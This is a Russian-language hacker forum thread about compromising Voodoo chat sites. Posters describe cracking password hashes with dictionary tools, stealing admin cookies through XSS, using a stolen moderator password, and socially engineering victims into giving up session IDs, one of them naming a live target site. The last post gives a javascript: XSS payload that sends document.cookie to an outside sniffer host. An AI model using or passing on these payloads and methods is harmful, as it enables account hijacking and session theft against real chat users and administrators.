Его расшифровать нельзя,а вот скачать словарик потом скачать password pro (он слова из словаря шифрует по тому же алгоритму и сравнивает) можно.

Мне подсказали что узнать пароль админа возможно только тогда, когда я достану его кукис, как это возможно, и есть ли какой то другой метод получения пароля админа? Неужели нету уязвимостей, никогда не поверю)

Ну тебе же дали Хss ими и воруй кукисы

ЧАТ - Voodoo. Спизд***л пасс от логина модератора! Когда захожу прав как у обычного юзера, мне сказали(тут на ачате) что возможно есть специальные команды типа _ban_ _kill_ или чё-та типа того. Изучал исходники, ничего там не нашел! Что это может быть! ЭТо Аккаунт модератора - 100%!

фига зло такое ..может его уже лишили модерских прав?? как заметили кражу пароля..?!

Всё разобрался, оказывапется ссылка на админку была сделана на маленьком смайле слева вверху )

Привет, принимайте новичка) помагите с получением сессий с \\www.love-chat.ru

Проблема в том что я обладаю не плохой СИ, но мало понимаю в сниферах=(

И ещё, как можно обычному юзеру (без XSS) посматреть свою сессию, а уж сказать её мне я его заставлю.

Заранее благадарю, с уважением ИЗ.

Чат действительно Voodoo, чё то он грузитца как будто у меня dial-up стоит

Ну попповоду сниферов юзай поиск, тут про xss и сниферы уже можно томов 5 собрать! А сессию открой html страницу sendera (это тот прямоугольничег где ты текст печатаешь что бы отправить) в txt и найди session, выглядеть будет так session=dd165fb008f5aac025a34ec7fa788939

Или там где мой статус, кликни правой кнопкой и зайди в свойства (смотрел чат через IE 6)

Но предупреждаю! Я один раз с помощью СИ зоставил жертву выдать мне её сессию, но мне пришло лиж #1234, потом выяснил что в чате стоял фильтр!!! Так что придумаешь что нибудь!

Так и есть, если просто вбить сессию то фильтр её отфильтрует!

Здраствуйте. Помогите новичку с составлением запроса для XSS. Нашел стандартную уязвимость в одном Voodoo-чате :
http://xxx.xxx/go.php?url=javascript:alert(/test/);
Составил следущий код:
http://ххх.ххх/go.php?url=javascript:img=new%20Image();img.src="h ttp://s.netsec.ru/cyber_rat.gif?"+document.cookie;

Но вместо рисунка появляется "[object]"

И еще :
alert(/test/); - выводит окошко с надписью /test/
но ни alert(test);, ни alert("test");, ни alert('test'); не выводят ничего.